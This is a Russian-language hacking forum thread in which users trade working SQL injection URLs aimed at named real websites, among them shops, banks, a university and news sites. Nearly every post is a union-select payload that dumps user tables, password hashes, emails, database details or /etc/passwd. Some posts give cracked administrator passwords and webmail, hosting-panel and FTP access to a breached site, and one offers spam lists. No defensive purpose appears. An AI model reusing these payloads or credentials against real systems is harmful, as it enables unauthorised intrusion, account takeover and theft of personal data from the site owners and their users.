SQL Инъекции

Code:

http://www.cybersquads.ru/articles/categories.php?arttype=-1'+union+select+1,2,3,4,5,6,7,8,concat(name,'%20:%20',password,'%20:%20',email,'%20:%20',icq,'%20:%20',homepage),10,11,12,13+from+users+limit+100/*

 

Code:

http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,concat(uname,0x3a,pass),4,5,6,7,8,9+from+users+limit+1,1/*

логин:пасс

 

Code:

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=1'

Подробности ошибки не выдает

 

Code:

http://b-s.com.ua/cgi-bin/catalog.pl?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12+from+zakaz/*

to Joker-jar

Code:

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(database(),char(58),user(),Char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*

 

2 Grey & Joker-jar

Code:

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+gorod_users/*

с именами столбцов, думаю, вы разберетесь

 

Code:

http://www.2msk.ru/?module=food&id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17/*

 

admin:dbcc4a47bc32b0e84903c632fb0dc08c => admin:lackawanna

root:54a43983056d0aa5 => root:f00bar
Админка - /admin. Залогиниться не могу ((

Идем дальше:

mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
Админку найти не могу((

И спам листы если кому нужны:

____

 

можно в webmail зайти

Code:

http://www.mcpost.com/webmail

а можно и в Control Panel хостера)

Code:

https://mmm2624.sbc-webhosting.com/cgi-bin/authApp?msg=LOGIN&redirect=/cgi-bin/secure/index

логин/пасс те же

 

+ ftp

Code:

ftp://mcpost:[email protected]

+++++

Code:

http://www.sader.org.tr/uyeler_detay.asp?id=2189768%20union%20select%200,ad,2,email,url,resim,firma,unvan,8,adres,telefon,fax,12,13,14,15,16,17%20from%20uyeler%20where%20id=[B]ID[/B]

меняем ID и инфо.
панели нетy или вроде ето только Members

 

Code:

http://www.hurriyetusa.com/haber/haber_detay.asp?id=973068465%20union%20select%200,1,2,3,4,5,6,7,8%20from%20admin

Help

Code:

http://www.panasonic.com.tr/urun_detay.asp?proid=633'%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20users

помогите со 2 ым

 

Т.к. скуля выводит все записи (все строки), то там где много ограничил её лимитом с 0 по 15 запись:

Code:

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version())/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+0,15/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(110,101,117,95,117,115,101,114,115)/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(id,char(58),login,char(58),password,char(58),name,char(58),email)+from+bers.neu_users/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(97,100,109,105,110,115)+limit+0,15/*

Code:

http://www.istrodina.com/rodina_articul.php3?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14/*

 

<noindex>
www.diamantbank.ua

Code:

http://www.diamantbank.ua/?el_id=-1+union+select+passwd+from+users/*

</noindex>

 

Очень давно выкладывал, но то была просто скуля без запроса...

*****

Вот тут дальше не продвинулся, если кто будет смотреть - отпишитесь че да как...

 

Давненько не выкладывал =(

Code:

http://www.simpleprinciples.com/main/main.html?Id=7+union+select+1,2,3,4,concat_ws(char(58),version(),database(),user())/*

 

Shoping

Code:

http://www.10dance.it/shop/pagine.php?id=-9+union+select+1,user(),3,4/*

Code:

http://www.euroinf.it/shop/shop.php?id=-86+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8/*

Code:

http://shop.colinmcraesport.com/item.php?id=-8+union+select+1,2,3,4,5,6,LOAD_FILE(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

Code:

http://www.kbmedien.ch/shop/bestellform.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

Code:

http://www.vlp-aspan.ch/de/shop/category.php?id=-6+union+select+concat(user_password,0x3a,user_name)+from+users+limit+13,1/*

перебор юзеров лимитом

 

www.ukma.kiev.ua

Национальный Университет Киево-Могилянской Академии


падлюки, не взяли меня =( пусть терь локти грызут

Code:

http://www.ukma.kiev.ua/news/news_detailed.php?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_users/*

 

Code:

http://www.ukrinfo.net/s.p?g=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
http://www.ukrinfo.net/s.p?g=-1+union+select+table_name+from+information_schema.tables+limit+17,1/*
http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(65,100,109,105,110)+limit+0,1/*
http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(99,111,110,116,114,111,108)+limit+0,1/*

 

0_o
upd

 

www.avtozazbank.com

Code:

http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

 

2Ksander